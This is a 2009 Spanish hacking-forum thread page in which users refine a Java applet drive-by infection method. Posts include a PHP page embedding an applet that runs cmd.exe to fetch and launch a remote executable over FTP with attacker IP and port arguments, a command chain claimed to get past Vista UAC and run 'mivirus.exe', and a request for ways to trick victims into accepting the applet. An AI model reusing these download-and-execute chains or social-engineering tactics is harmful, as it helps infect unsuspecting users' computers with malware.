[POC] Infección Mediante Java Applet (y VBScript) página 4

Foro de elhacker.net

Seguridad Informática

Hacking (Moderador: toxeek)

[POC] Infección Mediante Java Applet (y VBScript)

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: 1 2 3 [4] 5

Autor

Tema: [POC] Infección Mediante Java Applet (y VBScript) (Leído 30,764 veces)

andres52

Desconectado

Mensajes: 33

Re: [POC] Infección Mediante Java Applet (y VBScript)

« Respuesta #30 en: 23 Abril 2009, 07:02 am »

Listo, resuelto completamente... esque el código en php esta mal.. pero lo corregi y va perfecto.


	En línea

andres52

Desconectado

Mensajes: 33

Re: [POC] Infección Mediante Java Applet (y VBScript)

« Respuesta #31 en: 25 Abril 2009, 01:10 am »

Hola, soy yo otra vez... xd

Bueno... va perfecto nadamás en mi maquina porqe trate de hacerlo funcionar en otras y aunque abre el certificado java no me abre ni me activa nada... y si por ejemplo le ponga que abra un mensaje (el de hola mundo) que pefectamente funciona en esta pc.. en cualquier otra no lo abre... no entiendo porqe!!

El host estoy usando es PHONE ACCES, que en realidad hostea en webspacemania.. no se si tarden mucho en actualizar o algo.. porfavor alguien podria explicarme porque no funciona?

Editado-- Ya se solucionó... era cosa del servidor xd


« Última modificación: 25 Abril 2009, 06:22 am por andres52 »	En línea

A2Corp

Desconectado

Mensajes: 304

Re: [POC] Infección Mediante Java Applet (y VBScript)

« Respuesta #32 en: 23 Mayo 2009, 13:58 pm »

Alguien lo ha probado en win Vista?
el "Control de cuentas de usuario" creo que no deja ejecutar el bat.
:-[

Quien logro infectar en vista?


	En línea

Hackeo, luego existo...

A2Corp

Desconectado

Mensajes: 304

Re: [POC] Infección Mediante Java Applet (y VBScript)

« Respuesta #33 en: 23 Mayo 2009, 16:50 pm »

Investigue un poco y el problema esta en que no deja crear el archivo log.txt en la carpeta windows asi que podemos poner otra ruta.

Y hay otro problema que aun no soluciono:

Código:

E:\>ftp -s:log.txt
ftp> servidor@servidor.com
Comando no v lido.
ftp> mipassword123
Comando no v lido.
ftp> cd /
Desconectado.
ftp> pwd
Desconectado.
ftp> binary
Desconectado.
ftp> get Virus.exe
Desconectado.
ftp> bye

aparece como comando no valido al tratar de conectar con el ftp....
Es por el UAC me imagino.


	En línea

Hackeo, luego existo...

A2Corp

Desconectado

Mensajes: 304

Re: [POC] Infección Mediante Java Applet (y VBScript)

« Respuesta #34 en: 23 Mayo 2009, 17:39 pm »

Lo pongo todo separado para que se lea mejor...
Ya conseguir que funcione en Vista y burle el UAC:

cmd.exe /c
md c:\System32 &
cd c:\system32 &
echo try@servidor>c:\\System32\log.txt&
echo mipassword>>c:\\System32\log.txt&
echo cd />>c:\\System32\log.txt&
echo pwd>>c:\\System32\log.txt&
echo binary>>c:\\System32\log.txt &
echo get mivirus.exe>>c:\\System32\log.txt&
echo bye>>c:\\System32\log.txt &
echo quit>>c:\\System32\log.txt &
ftp -s:c:\\System32\log.txt baires03.com.ar &
start mivirus.exe

asi no tocamos ninguna ruta sospechosa para el UAC y nos deja hacer todo el proceso


	En línea

Hackeo, luego existo...

m[a]rkus

Desconectado

Mensajes: 64

Si juegas a ser hacker piensa como un hacker.

Re: [POC] Infección Mediante Java Applet (y VBScript)

« Respuesta #35 en: 1 Junio 2009, 02:21 am »

Hola la verdad encontre información sobre este tema en otro sitios (en inglés) y me resulto muy complicado por la poca explicación que ofrecian, y buscando mas en google aparecio esto, bien lo que me sucede actualmente es lo que le ah pasado a varios aqui pero que no dicen como lo corrijieron o al menos yo no lo vi, yo tengo este codigo:

Código:

<?php
if(isset($HTTP_GET_VARS["board"])) {
	$ip = $HTTP_GET_VARS["board"];
	echo $ip;
}
 
else $ip = "127.0.0.1";
 
if(isset($HTTP_GET_VARS["topic"])) {
	$puerto = $HTTP_GET_VARS["topic"];
	echo $puerto;
}
 
else $puerto = 666;
 
echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c cd C:\\ & echo usuario@ftp.com>datos.txt&echo contraseña>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get Client.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.com&start Client.exe ".$ip." ".$puerto."&pause'>";
echo "</applet>";
 
?>

Al abrir se demora unos 6 o 7 segundos y sale un mensaje de error "Aplicación Win32 no Valida" fue a la ruta y estaba el "datos.txt" y "Cliente.exe" pero con 0 bytes leyendo vi que a algunos les ah pasado y dicen que es un error que tenia el PHP pero no soy capaz de encontrarlo. Seria de agradecer que lo postearas un saludo y gracias por adelantado.

Resuelto: Cambiar server FTP
El code esta bien


« Última modificación: 7 Junio 2009, 05:14 am por m[a]rkus »	En línea

Existen dos maneras de ser feliz en esta vida, una es hacerse el idiota y la otra serlo.

andres52

Desconectado

Mensajes: 33

Re: [POC] Infección Mediante Java Applet (y VBScript)

« Respuesta #36 en: 4 Julio 2009, 05:52 am »

Una duda, para que sirve el /c?

cmd.exe /c cd C:\...

solo por curiosidad :]


	En línea

Novlucker

Ninja y
Colaborador

Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces

Re: [POC] Infección Mediante Java Applet (y VBScript)

« Respuesta #37 en: 4 Julio 2009, 23:24 pm »

Código

C:\Documents and Settings\Novlucker>cmd /?
Inicia una nueva instancia del intérprete de comandos de Windows XP
 
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
 [[/S] [/C | /K] cadena]
 
/C Ejecuta el comando especificado en cadena y luego finaliza

Ejecuta todos los comandos que vienen después

Saludos


	En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro."

Albert Einstein

andres52

Desconectado

Mensajes: 33

Re: [POC] Infección Mediante Java Applet (y VBScript)

« Respuesta #38 en: 12 Julio 2009, 05:11 am »

Muchas gracias por tu respuesta Novlucker.

Ahora lo que quiero es borrar la carpeta creada aqui:

Citar

le pongo &cd..&rd system32 /s /q y no funciona.. no la borra.. pero poniendo ese código directamente en la consola si la borra... porque?

Edit- Ya vi porque no la borra... tiene el exe activado todavia.. bueno no es de mucha importancia, pues si ya la persona esta infectada puedo borrar la carpeta manualmente Pero ahora el problema es otro, cuando el usuario es limitado y tiene el uac activado, no funciona el código, no tengo idea porque pero no crea la carpeta ni activa nada... aún cuando en el cmd si puedo hacerlo manualmente (y aún cuando ya probé sin el uac activado y si funcionaba) ¿Porque ocurre esto?


« Última modificación: 12 Julio 2009, 05:46 am por andres52 »	En línea

A2Corp

Desconectado

Mensajes: 304

Re: [POC] Infección Mediante Java Applet (y VBScript)

« Respuesta #39 en: 15 Julio 2009, 03:26 am »

me tiene bien satisfecho este metodo de infección pero no del todo no falta el que por desesperado le pique a cancelar porque penso que era publicidad o alguna otra cosa.
Se les ocurre algo que oriente o casi obligue al usuario a darle click a Aceptar?
:/


	En línea

Hackeo, luego existo...

Páginas: 1 2 3 [4] 5

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Infeccion de dispositivos USBs mediante archivos LNK Análisis y Diseño de Malware	Jaixon Jax	4	6,965	1 Diciembre 2010, 02:25 am por Stelio Kontos
	Ejemplo de infección mediante TLS Callbacks Análisis y Diseño de Malware	The Swash	0	2,316	16 Mayo 2011, 02:16 am por The Swash